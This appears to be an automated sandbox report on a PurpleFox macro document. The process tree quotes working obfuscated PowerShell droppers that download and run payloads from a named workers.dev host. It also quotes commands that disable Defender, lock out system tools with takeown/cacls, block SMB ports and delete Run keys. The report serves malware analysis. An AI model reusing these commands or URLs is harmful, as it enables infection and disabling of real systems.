Resubmissions

21/09/2023, 07:25

230921-h86p5sgc32 10

20/09/2023, 23:55

230920-3yrhpabc6y 10

Analysis

  • max time kernel
    101s
  • max time network
    103s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    21/09/2023, 07:25

General

  • Target

    ID-191304203986.docm

  • Size

    44KB

  • MD5

    8c498f9e6dd65c5a9704208922224661

  • SHA1

    1dc2f872c2e23e1eb0c6090909c5807553ad1e75

  • SHA256

    38f581881093c044667d565a698aa389f14585a58d5c8b692dc2be851293f1c2

  • SHA512

    b6a5eceef6739421ed2f0f6a479df496ecb1894b7694651b24a50689d663b1d7f1b1bf58c2edacf6a2fa59908a58f25cd00e389765871cb1856acb3431bcca50

  • SSDEEP

    768:T6D/hwDg0kIo+rQGtBMIYta9l87miNPZjinjUeipoRkqk:T6D/u801rQIBMNg86AB+njUpoqqk

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/zKJFnbnzeum8/37d4fddb6bf2de6611c6655a5cd37972fc33642d/ace.jpg

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/T2qomNwfFUeS/62f331959dde379b2536caed26a74ae8460c0c30/all.png

Extracted

Language
ps1
Source
URLs
exe.dropper

http://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/5hwtrLyyHFiv/7b0985c861986ec9e2087ade8273e544009d68e1/SsdxxIp8DqeQ.jpg

Signatures

  • Detect PurpleFox MSI 1 IoCs

    Detect PurpleFox MSI.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • PurpleFox

    PurpleFox is an exploit kit used to distribute other malware families and first seen in 2018.

  • Blocklisted process makes network request 3 IoCs
  • Stops running service(s) 3 TTPs
  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 6 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 12 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies data under HKEY_USERS 44 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ID-191304203986.docm"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2016
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1140
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
        PowerShell -nop -exec bypass -w hidden -Enc DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADAAOwAkAGkAKwArACkADQAKAHsADQAKAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAG4AbwBwACAALQBlAHgAZQBjACAAYgB5AHAAYQBzAHMAIAAtAGMAIAAiAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAGIAbABhAGMAawAtAHMAdQBuAC0AYQAzADMANQAuAGEAcwB5AG8AcgBmAHAAbABtAG4AdgAuAHcAbwByAGsAZQByAHMALgBkAGUAdgAvAG0AbgB3AE8ARABCAHAAdABLADYAagBVAC8AegBLAEoARgBuAGIAbgB6AGUAdQBtADgALwAzADcAZAA0AGYAZABkAGIANgBiAGYAMgBkAGUANgA2ADEAMQBjADYANgA1ADUAYQA1AGMAZAAzADcAOQA3ADIAZgBjADMAMwA2ADQAMgBkAC8AYQBjAGUALgBqAHAAZwAnACkAIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADEAOAAwAA0ACgB9AA0ACgA=
        2⤵
        • Process spawned unexpected child process
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2644
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/zKJFnbnzeum8/37d4fddb6bf2de6611c6655a5cd37972fc33642d/ace.jpg')"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2612
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -w hidden -Enc DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADAAOwAkAGkAKwArACkADQAKAHsADQAKAHMAYQBsACAAYQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAOwBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwAkAGcAPQBhACAAUwB5AHMAdABlAG0ALgBEAHIAYQB3AGkAbgBnAC4AQgBpAHQAbQBhAHAAKAAoAGEAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBPAHAAZQBuAFIAZQBhAGQAKAAiAGgAdAB0AHAAOgAvAC8AYgBsAGEAYwBrAC0AcwB1AG4ALQBhADMAMwA1AC4AYQBzAHkAbwByAGYAcABsAG0AbgB2AC4AdwBvAHIAawBlAHIAcwAuAGQAZQB2AC8AbQBuAHcATwBEAEIAcAB0AEsANgBqAFUALwBUADIAcQBvAG0ATgB3AGYARgBVAGUAUwAvADYAMgBmADMAMwAxADkANQA5AGQAZABlADMANwA5AGIAMgA1ADMANgBjAGEAZQBkADIANgBhADcANABhAGUAOAA0ADYAMABjADAAYwAzADAALwBhAGwAbAAuAHAAbgBnACIAKQApADsAJABvAD0AYQAgAEIAeQB0AGUAWwBdACAAMgA1ADYAMAA7ACgAMAAuAC4AMwAxACkAfAAlAHsAZgBvAHIAZQBhAGMAaAAoACQAeAAgAGkAbgAoADAALgAuADcAOQApACkAewAkAHAAPQAkAGcALgBHAGUAdABQAGkAeABlAGwAKAAkAHgALAAkAF8AKQA7ACQAbwBbACQAXwAqADgAMAArACQAeABdAD0AKABbAG0AYQB0AGgAXQA6ADoARgBsAG8AbwByACgAKAAkAHAALgBCAC0AYgBhAG4AZAAxADUAKQAqADEANgApAC0AYgBvAHIAKAAkAHAALgBHACAALQBiAGEAbgBkACAAMQA1ACkAKQB9AH0AOwBJAEUAWAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABvAFsAMAAuAC4AMgA1ADEAMgBdACkAKQA7AE0AcwBpAE0AYQBrAGUAIABoAHQAdABwADoALwAvAGIAbABhAGMAawAtAHMAdQBuAC0AYQAzADMANQAuAGEAcwB5AG8AcgBmAHAAbABtAG4AdgAuAHcAbwByAGsAZQByAHMALgBkAGUAdgAvAG0AbgB3AE8ARABCAHAAdABLADYAagBVAC8ANQBoAHcAdAByAEwAeQB5AEgARgBpAHYALwA3AGIAMAA5ADgANQBjADgANgAxADkAOAA2AGUAYwA5AGUAMgAwADgANwBhAGQAZQA4ADIANwAzAGUANQA0ADQAMAAwADkAZAA2ADgAZQAxAC8AUwBzAGQAeAB4AEkAcAA4AEQAcQBlAFEALgBqAHAAZwA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADEAOAAwAA0ACgB9AA0ACgA=
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2812
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -EncodedCommand DQAKAFMAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEQAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdABvAHIAaQBuAGcAIAAkAHQAcgB1AGUADQAKAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAiACQAZQBuAHYAOgB3AGkAbgBkAGkAcgAiAA0ACgAkAFIAZQBnAGsAZQB5AHAAYQB0AGgAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXAA3AC0AWgBpAHAAIgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABQAEYAOAA4AGQATgBjAGQAcwBEAEQAcQBlADcAWgBmAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAaQAuAGQAbABsACIALAAgAEMAaABhAHIAUwBlAHQAPQBDAGgAYQByAFMAZQB0AC4AQQB1AHQAbwApAF0ADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATQBzAGkASQBuAHMAdABhAGwAbABQAHIAbwBkAHUAYwB0ACgAcwB0AHIAaQBuAGcAIABwAGEAYwBrAGEAZwBlAFAAYQB0AGgALAAgAHMAdAByAGkAbgBnACAAYwBvAG0AbQBhAG4AZABMAGkAbgBlACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAGkALgBkAGwAbAAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABNAHMAaQBTAGUAdABJAG4AdABlAHIAbgBhAGwAVQBJACgAaQBuAHQAIABkAHcAVQBJAEwAZQB2AGUAbAAsACAASQBuAHQAUAB0AHIAIABwAGgAVwBuAGQAKQA7AA0ACgB9AA0ACgAiAEAADQAKAGQAbwANAAoAewANAAoAJABtAHMAaQBwAGEAdABoAEEAIAA9ACAAIgBoAHQAdABwADoALwAvAGIAbABhAGMAawAtAHMAdQBuAC0AYQAzADMANQAuAGEAcwB5AG8AcgBmAHAAbABtAG4AdgAuAHcAbwByAGsAZQByAHMALgBkAGUAdgAvAG0AbgB3AE8ARABCAHAAdABLADYAagBVAC8ANQBoAHcAdAByAEwAeQB5AEgARgBpAHYALwA3AGIAMAA5ADgANQBjADgANgAxADkAOAA2AGUAYwA5AGUAMgAwADgANwBhAGQAZQA4ADIANwAzAGUANQA0ADQAMAAwADkAZAA2ADgAZQAxAC8AUwBzAGQAeAB4AEkAcAA4AEQAcQBlAFEALgBqAHAAZwAiAA0ACgAkAG0AcwBpAHAAYQB0AGgAQQBMAEwAIAA9ACAAQAAoACIAJABtAHMAaQBwAGEAdABoAEEAIgAsACIAJABtAHMAaQBwAGEAdABoAEEAIgApAA0ACgAkAE4AZABTAFUASQB3AHUAdQBXAG4AcABZAEgAegBGAHUAIAA9ACAAZwBlAHQALQByAGEAbgBkAG8AbQAgACQAbQBzAGkAcABhAHQAaABBAEwATAA7AA0ACgBbAFAARgA4ADgAZABOAGMAZABzAEQARABxAGUANwBaAGYAXQA6ADoATQBzAGkAUwBlAHQASQBuAHQAZQByAG4AYQBsAFUASQAoADIALAAwACkAOwANAAoAWwBQAEYAOAA4AGQATgBjAGQAcwBEAEQAcQBlADcAWgBmAF0AOgA6AE0AcwBpAEkAbgBzAHQAYQBsAGwAUAByAG8AZAB1AGMAdAAoACIAJABOAGQAUwBVAEkAdwB1AHUAVwBuAHAAWQBIAHoARgB1ACIALAAiACIAKQANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAANgAwAA0ACgB9AA0ACgB1AG4AdABpAGwAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAFIAZQBnAGsAZQB5AHAAYQB0AGgAIAAtAG4AYQBtAGUAIABTAHQAYQB5AE8AbgBUAG8AcAApAA0ACgA=
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2748
              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wgi_mj_m.cmdline"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:1500
                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7D2C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC7D2B.tmp"
                  7⤵
                    PID:1248
      • C:\Windows\system32\msiexec.exe
        C:\Windows\system32\msiexec.exe /V
        1⤵
        • Blocklisted process makes network request
        • Enumerates connected drives
        • Drops file in Windows directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1624
        • C:\Windows\syswow64\MsiExec.exe
          C:\Windows\syswow64\MsiExec.exe -Embedding 89A881C08E51DEAAB6D34E207D33A546
          2⤵
          • Loads dropped DLL
          PID:572
        • C:\Windows\syswow64\MsiExec.exe
          C:\Windows\syswow64\MsiExec.exe -Embedding 0CF18543665C24DC01D12DE92805D715 M Global\MSI0000
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1980
          • C:\Windows\SysWOW64\powercfg.exe
            "C:\Windows\SysWOW64\powercfg.exe" /S 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2056
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -Seconds 900; Restart-Computer -Force
            3⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2256
          • C:\Windows\SysWOW64\netsh.exe
            "C:\Windows\SysWOW64\netsh.exe" ipsec static add policy name=qianye
            3⤵
            • Modifies data under HKEY_USERS
            PID:1788
          • C:\Windows\SysWOW64\netsh.exe
            "C:\Windows\SysWOW64\netsh.exe" ipsec static add filterlist name=Filter1
            3⤵
            • Modifies data under HKEY_USERS
            PID:1520
          • C:\Windows\SysWOW64\netsh.exe
            "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
            3⤵
            • Modifies data under HKEY_USERS
            PID:1596
          • C:\Windows\SysWOW64\netsh.exe
            "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
            3⤵
            • Modifies data under HKEY_USERS
            PID:3040
          • C:\Windows\SysWOW64\netsh.exe
            "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
            3⤵
            • Modifies data under HKEY_USERS
            PID:2324
          • C:\Windows\SysWOW64\netsh.exe
            "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
            3⤵
            • Modifies data under HKEY_USERS
            PID:2008
          • C:\Windows\SysWOW64\netsh.exe
            "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
            3⤵
            • Modifies data under HKEY_USERS
            PID:2060
          • C:\Windows\SysWOW64\netsh.exe
            "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
            3⤵
            • Modifies data under HKEY_USERS
            PID:2428
          • C:\Windows\SysWOW64\netsh.exe
            "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=2222 protocol=TCP
            3⤵
            • Modifies data under HKEY_USERS
            PID:2196
          • C:\Windows\SysWOW64\netsh.exe
            "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=3333 protocol=TCP
            3⤵
            • Modifies data under HKEY_USERS
            PID:2984
          • C:\Windows\SysWOW64\netsh.exe
            "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=4444 protocol=TCP
            3⤵
            • Modifies data under HKEY_USERS
            PID:2716
          • C:\Windows\SysWOW64\netsh.exe
            "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=5555 protocol=TCP
            3⤵
            • Modifies data under HKEY_USERS
            PID:2356
          • C:\Windows\SysWOW64\netsh.exe
            "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=6666 protocol=TCP
            3⤵
            • Modifies data under HKEY_USERS
            PID:2892
          • C:\Windows\SysWOW64\netsh.exe
            "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=7777 protocol=TCP
            3⤵
            • Modifies data under HKEY_USERS
            PID:328
          • C:\Windows\SysWOW64\netsh.exe
            "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=8888 protocol=TCP
            3⤵
            • Modifies data under HKEY_USERS
            PID:2560
          • C:\Windows\SysWOW64\netsh.exe
            "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9000 protocol=TCP
            3⤵
            • Modifies data under HKEY_USERS
            PID:2912
          • C:\Windows\SysWOW64\netsh.exe
            "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9999 protocol=TCP
            3⤵
            • Modifies data under HKEY_USERS
            PID:1308
          • C:\Windows\SysWOW64\netsh.exe
            "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14443 protocol=TCP
            3⤵
            • Modifies data under HKEY_USERS
            PID:1748
          • C:\Windows\SysWOW64\netsh.exe
            "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14444 protocol=TCP
            3⤵
            • Modifies data under HKEY_USERS
            PID:2096
          • C:\Windows\SysWOW64\netsh.exe
            "C:\Windows\SysWOW64\netsh.exe" ipsec static add filteraction name=FilteraAtion1 action=block
            3⤵
            • Modifies data under HKEY_USERS
            PID:1952
          • C:\Windows\SysWOW64\netsh.exe
            "C:\Windows\SysWOW64\netsh.exe" ipsec static add rule name=Rule1 policy=qianye filterlist=Filter1 filteraction=FilteraAtion1
            3⤵
            • Modifies data under HKEY_USERS
            PID:108
          • C:\Windows\SysWOW64\netsh.exe
            "C:\Windows\SysWOW64\netsh.exe" ipsec static set policy name=qianye assign=y
            3⤵
            • Modifies data under HKEY_USERS
            PID:1704
          • C:\Windows\SysWOW64\takeown.exe
            "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\jscript.dll
            3⤵
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:788
          • C:\Windows\SysWOW64\cacls.exe
            "C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\jscript.dll /E /P everyone:N
            3⤵
              PID:760
            • C:\Windows\SysWOW64\takeown.exe
              "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\jscript.dll
              3⤵
              • Modifies file permissions
              • Suspicious use of AdjustPrivilegeToken
              PID:1684
            • C:\Windows\SysWOW64\cacls.exe
              "C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\jscript.dll /E /P everyone:N
              3⤵
                PID:1904
              • C:\Windows\SysWOW64\takeown.exe
                "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\cscript.exe
                3⤵
                • Modifies file permissions
                • Suspicious use of AdjustPrivilegeToken
                PID:1376
              • C:\Windows\SysWOW64\cacls.exe
                "C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\cscript.exe /E /P everyone:N
                3⤵
                  PID:2824
                • C:\Windows\SysWOW64\takeown.exe
                  "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\cscript.exe
                  3⤵
                  • Modifies file permissions
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1848
                • C:\Windows\SysWOW64\cacls.exe
                  "C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\cscript.exe /E /P everyone:N
                  3⤵
                    PID:1968
                  • C:\Windows\SysWOW64\takeown.exe
                    "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                    3⤵
                    • Modifies file permissions
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2440
                  • C:\Windows\SysWOW64\cacls.exe
                    "C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /E /P everyone:N
                    3⤵
                      PID:3032
                    • C:\Windows\SysWOW64\takeown.exe
                      "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
                      3⤵
                      • Modifies file permissions
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2220
                    • C:\Windows\SysWOW64\cacls.exe
                      "C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe /E /P everyone:N
                      3⤵
                        PID:1180
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\SysWOW64\reg.exe" delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /va /f
                        3⤵
                          PID:2532
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\SysWOW64\reg.exe" delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /va /f
                          3⤵
                            PID:1804
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\SysWOW64\reg.exe" delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg /f
                            3⤵
                              PID:2544
                            • C:\Windows\SysWOW64\sc.exe
                              "C:\Windows\SysWOW64\sc.exe" stop wmiApSrv
                              3⤵
                              • Launches sc.exe
                              PID:2716
                            • C:\Windows\SysWOW64\sc.exe
                              "C:\Windows\SysWOW64\sc.exe" config wmiApSrv start=disabled
                              3⤵
                              • Launches sc.exe
                              PID:2864

                        Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Config.Msi\f768baf.rbs

                          Filesize

                          2KB

                          MD5

                          b3d9d4dbfbe2379c1e76b5a384a082b0

                          SHA1

                          0ae60dc073d2320f53403284fe74e25f3dd09d08

                          SHA256

                          4a630045ddc6c5059196ca4e209f1238e2fd4a5b04402564fc73bd9b05f12486

                          SHA512

                          2e2a3e4e9931c264de7641b36927595f9ffb07be81102b71918a207d4e806b323fb546fe710ba1cbac5a01cd73ed92daf286c408ee2054488adb82e5b43f422d

                        • C:\Users\Admin\AppData\Local\Temp\RES7D2C.tmp

                          Filesize

                          1KB

                          MD5

                          5b02ad8f68e3d0f3c64b06a525f4e0e6

                          SHA1

                          0197fc25890b5a02cad9c7c866759ff7624d097a

                          SHA256

                          b153663926ed99d8da2072bae2b782b27593bc41f255c897c546c4c3a19c8d5a

                          SHA512

                          6b4c36d43c9d16b598f2cd8e315701beed91703c6af2bddc12a3a69144777e9de5b40fd43f9e8834a7f284fe8b1e696fc4266ea3949e5787a83e657a91f36c6a

                        • C:\Users\Admin\AppData\Local\Temp\wgi_mj_m.dll

                          Filesize

                          3KB

                          MD5

                          041e7c89754453002fe7dd75850308ea

                          SHA1

                          a4d88f2421cc5aac0ea0804a2ffedf7fab4450ad

                          SHA256

                          bcb25f659b319d294580b68c9fa42cd370441c87dd87c7ed994ab0a7f5a9ee57

                          SHA512

                          2519d036e53c0a577e555ef8b664c748544fa8cb8764ef3abfd0cf5be5baa273e7d37ffa07db534ff83077f4821d03bad204535aea7c188a2c5dc4a92922f024

                        • C:\Users\Admin\AppData\Local\Temp\wgi_mj_m.pdb

                          Filesize

                          7KB

                          MD5

                          ae876ec12e84bb7c80e1ad1f63f6d424

                          SHA1

                          69c42c4b18becb8d59d9fec00246f1710f4950cb

                          SHA256

                          6c2d8c90f19e9449b1d23748fb9b2f45f96679dcc318de535b1aaa22ab4f248c

                          SHA512

                          b78c5595a71b46804d69897b868549af25b7af0fe7578bb93248e114ebd760b2b6416afe491d55e61a03e5aa6d44338ec62b7844ef5e86dc7dfed371dd69c558

                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\30V4F5FIYBI1D0DE9OKB.temp

                          Filesize

                          7KB

                          MD5

                          bf6d377ac754794f44dbb8eabaca3507

                          SHA1

                          6538fa918c9a8ab7f8a0b91d9e8b9862ae0b4b0c

                          SHA256

                          0554e56ed668582135f30906e9a6950dc32da20ae172c8000ca0726b55987a50

                          SHA512

                          599a39655e23de5aaaf3b8339caeb96bb5e43a8a75822f29ad06575266058935af17dd4ac4125067c973daf68f3c46a35e60ba5eecc91fd97dcdc259065af6a0

                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

                          Filesize

                          7KB

                          MD5

                          bf6d377ac754794f44dbb8eabaca3507

                          SHA1

                          6538fa918c9a8ab7f8a0b91d9e8b9862ae0b4b0c

                          SHA256

                          0554e56ed668582135f30906e9a6950dc32da20ae172c8000ca0726b55987a50

                          SHA512

                          599a39655e23de5aaaf3b8339caeb96bb5e43a8a75822f29ad06575266058935af17dd4ac4125067c973daf68f3c46a35e60ba5eecc91fd97dcdc259065af6a0

                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

                          Filesize

                          7KB

                          MD5

                          bf6d377ac754794f44dbb8eabaca3507

                          SHA1

                          6538fa918c9a8ab7f8a0b91d9e8b9862ae0b4b0c

                          SHA256

                          0554e56ed668582135f30906e9a6950dc32da20ae172c8000ca0726b55987a50

                          SHA512

                          599a39655e23de5aaaf3b8339caeb96bb5e43a8a75822f29ad06575266058935af17dd4ac4125067c973daf68f3c46a35e60ba5eecc91fd97dcdc259065af6a0

                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

                          Filesize

                          7KB

                          MD5

                          bf6d377ac754794f44dbb8eabaca3507

                          SHA1

                          6538fa918c9a8ab7f8a0b91d9e8b9862ae0b4b0c

                          SHA256

                          0554e56ed668582135f30906e9a6950dc32da20ae172c8000ca0726b55987a50

                          SHA512

                          599a39655e23de5aaaf3b8339caeb96bb5e43a8a75822f29ad06575266058935af17dd4ac4125067c973daf68f3c46a35e60ba5eecc91fd97dcdc259065af6a0

                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

                          Filesize

                          7KB

                          MD5

                          bf6d377ac754794f44dbb8eabaca3507

                          SHA1

                          6538fa918c9a8ab7f8a0b91d9e8b9862ae0b4b0c

                          SHA256

                          0554e56ed668582135f30906e9a6950dc32da20ae172c8000ca0726b55987a50

                          SHA512

                          599a39655e23de5aaaf3b8339caeb96bb5e43a8a75822f29ad06575266058935af17dd4ac4125067c973daf68f3c46a35e60ba5eecc91fd97dcdc259065af6a0

                        • C:\Windows\Installer\MSI8279.tmp

                          Filesize

                          2.9MB

                          MD5

                          eb9a4cf233789b96f940be0186a26988

